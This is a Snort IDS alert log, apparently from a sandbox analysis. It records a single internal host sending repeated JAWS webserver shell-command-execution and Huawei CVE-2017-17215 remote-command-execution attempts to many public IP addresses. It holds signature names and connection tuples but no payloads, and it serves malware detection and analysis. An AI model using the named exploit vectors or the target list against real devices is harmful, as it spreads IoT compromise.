      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:51212 -> 18.220.172.82:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55792 -> 104.149.154.69:80
      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:32892 -> 156.247.30.23:37215
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:38044 -> 85.17.194.165:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48406 -> 34.98.102.7:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52266 -> 192.185.42.236:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:51176 -> 79.150.39.35:80
      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:42054 -> 156.224.31.221:37215
      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:45370 -> 156.226.96.138:37215
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:35296 -> 44.196.135.130:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:35964 -> 12.133.236.214:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:44276 -> 213.215.11.203:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52538 -> 192.126.133.99:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33472 -> 197.47.78.78:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59182 -> 103.224.99.151:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:57660 -> 34.203.102.247:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:35620 -> 13.35.133.140:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58850 -> 77.68.75.99:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:57956 -> 216.52.215.115:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39618 -> 179.53.73.240:80
      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:41668 -> 156.224.28.108:37215
      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:54366 -> 156.226.106.255:37215
      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:59512 -> 156.254.71.31:37215
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34680 -> 104.76.130.252:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:45628 -> 106.248.230.83:80
      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:60482 -> 156.244.104.200:37215
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58676 -> 82.166.224.114:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39354 -> 186.179.42.63:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:49710 -> 135.181.161.58:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33748 -> 160.124.63.240:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:35044 -> 86.24.52.107:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33608 -> 23.199.17.4:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48990 -> 117.207.183.219:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:36414 -> 52.165.152.43:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:50278 -> 104.75.122.204:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55962 -> 61.71.107.192:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:46776 -> 80.151.226.224:80
      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:47132 -> 197.234.41.148:37215
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41466 -> 173.230.132.181:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:51156 -> 47.40.30.154:80
      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:36062 -> 156.250.11.236:37215
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:51858 -> 156.241.163.108:80
      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:56196 -> 156.245.61.154:37215
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:49076 -> 104.88.20.17:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:35980 -> 23.201.78.218:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:51538 -> 78.47.166.161:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42624 -> 23.199.131.212:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52492 -> 184.168.123.229:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:46720 -> 181.214.234.185:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:40672 -> 45.60.141.69:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:38922 -> 156.230.249.106:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39052 -> 104.101.72.152:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:35748 -> 54.187.208.171:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:44938 -> 184.87.124.155:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59338 -> 69.10.58.197:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:53078 -> 96.7.157.111:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41734 -> 168.196.224.240:80
      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:35910 -> 156.241.9.58:37215
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:43492 -> 85.38.60.162:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:49404 -> 104.69.0.60:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:46268 -> 17.248.207.11:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33572 -> 24.97.13.210:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:50732 -> 216.239.140.62:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33828 -> 59.6.82.111:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48538 -> 177.185.63.99:80
      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:48104 -> 156.254.49.254:37215
      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:40618 -> 156.250.86.128:37215
      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:38034 -> 156.244.92.177:37215
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42490 -> 194.59.205.185:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59298 -> 139.162.171.34:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54838 -> 51.89.151.146:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48542 -> 65.21.193.46:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47750 -> 121.189.165.124:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:50024 -> 67.215.248.172:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37450 -> 206.74.222.89:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:53668 -> 186.189.233.24:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:40830 -> 92.122.27.115:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39512 -> 35.190.126.64:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:51622 -> 23.196.204.237:80
      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:48722 -> 156.254.110.105:37215
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34494 -> 168.196.159.177:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:46480 -> 84.250.224.57:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56586 -> 81.43.46.233:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:43788 -> 23.218.195.212:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:46792 -> 172.252.255.83:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:51100 -> 189.237.62.243:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55522 -> 23.80.16.179:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33332 -> 104.107.244.158:80
      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:60060 -> 156.235.96.1:37215
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42198 -> 95.216.181.158:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:57556 -> 177.185.54.27:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52254 -> 118.41.137.148:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:57310 -> 108.158.242.86:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:53770 -> 47.244.212.92:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41168 -> 84.86.204.236:80
      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:44256 -> 156.254.77.94:37215
      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:50584 -> 156.238.49.85:37215
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42404 -> 95.216.181.158:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34686 -> 68.183.192.120:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:49598 -> 104.144.211.136:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:43684 -> 192.230.81.84:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59744 -> 34.84.40.120:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60866 -> 54.147.75.59:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:36980 -> 129.219.200.64:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:43150 -> 41.175.50.107:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:36184 -> 23.13.112.198:80
      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:33208 -> 156.250.95.93:37215
      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:37424 -> 156.241.11.57:37215
      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:43604 -> 156.241.13.143:37215
      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:47706 -> 156.241.83.75:37215
      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:35624 -> 156.247.30.15:37215
      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:53046 -> 156.234.226.48:37215
      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:49880 -> 156.235.98.176:37215
      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:54042 -> 156.226.112.230:37215
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56672 -> 40.84.38.74:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55434 -> 90.65.228.203:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:46248 -> 186.6.111.133:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:46932 -> 50.87.189.132:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34026 -> 23.105.63.226:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:50688 -> 199.232.38.208:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33166 -> 104.215.11.201:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54822 -> 61.222.103.41:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48008 -> 23.21.212.183:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37394 -> 104.119.244.135:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55618 -> 23.81.240.94:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52064 -> 20.27.16.54:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:57302 -> 43.231.9.11:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:38066 -> 78.46.9.52:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:35520 -> 81.128.180.229:80
      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:60448 -> 156.226.48.144:37215
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56718 -> 84.54.129.137:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37234 -> 69.192.41.249:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34602 -> 38.54.203.247:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:51512 -> 52.41.188.187:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48544 -> 14.35.75.203:80
      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:50222 -> 156.226.118.164:37215
      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:59084 -> 156.254.48.228:37215
      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:59908 -> 156.250.123.114:37215
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47670 -> 156.252.102.106:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42478 -> 13.125.81.52:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56598 -> 18.195.111.51:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:35476 -> 138.201.183.217:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:53276 -> 145.118.2.67:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37544 -> 188.166.175.227:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33622 -> 104.120.217.91:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48802 -> 34.120.139.101:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:44454 -> 80.62.237.246:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48624 -> 94.130.254.159:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:43868 -> 95.179.147.84:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:46324 -> 104.120.49.223:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59972 -> 23.239.25.120:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:44120 -> 156.248.235.94:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:49382 -> 103.140.67.185:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:57314 -> 104.76.84.151:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42546 -> 35.72.43.61:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:36406 -> 13.125.39.85:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34796 -> 23.38.0.215:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33700 -> 104.120.217.91:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60454 -> 192.227.174.48:80
      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:38752 -> 156.254.42.157:37215
      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:53460 -> 156.226.91.106:37215
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37756 -> 134.84.231.19:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:46680 -> 31.149.101.226:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:43154 -> 163.191.102.2:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58046 -> 190.55.55.22:80
      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:54378 -> 156.226.100.83:37215
      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:56984 -> 156.250.13.159:37215
      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:37300 -> 156.225.145.22:37215
      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:33774 -> 156.225.158.208:37215
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:49404 -> 81.147.98.26:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:57622 -> 65.21.9.211:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56418 -> 104.97.153.105:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37952 -> 149.56.206.204:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54760 -> 51.104.181.173:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54846 -> 149.169.176.20:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:36730 -> 185.182.76.162:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:35164 -> 23.48.68.43:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:43504 -> 54.252.159.174:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:51350 -> 23.100.80.116:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:35344 -> 68.65.123.172:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:46370 -> 34.117.4.79:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48734 -> 218.149.214.156:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:38456 -> 63.246.135.11:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:38828 -> 8.48.85.167:80
      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:45486 -> 156.226.127.161:37215
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59782 -> 45.226.67.86:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60946 -> 203.45.224.195:80
      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:40834 -> 156.254.83.172:37215
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54712 -> 183.96.177.81:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:43432 -> 92.205.95.25:80
      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:47448 -> 156.244.74.223:37215
      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:38200 -> 156.250.30.251:37215
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48536 -> 199.192.29.175:80
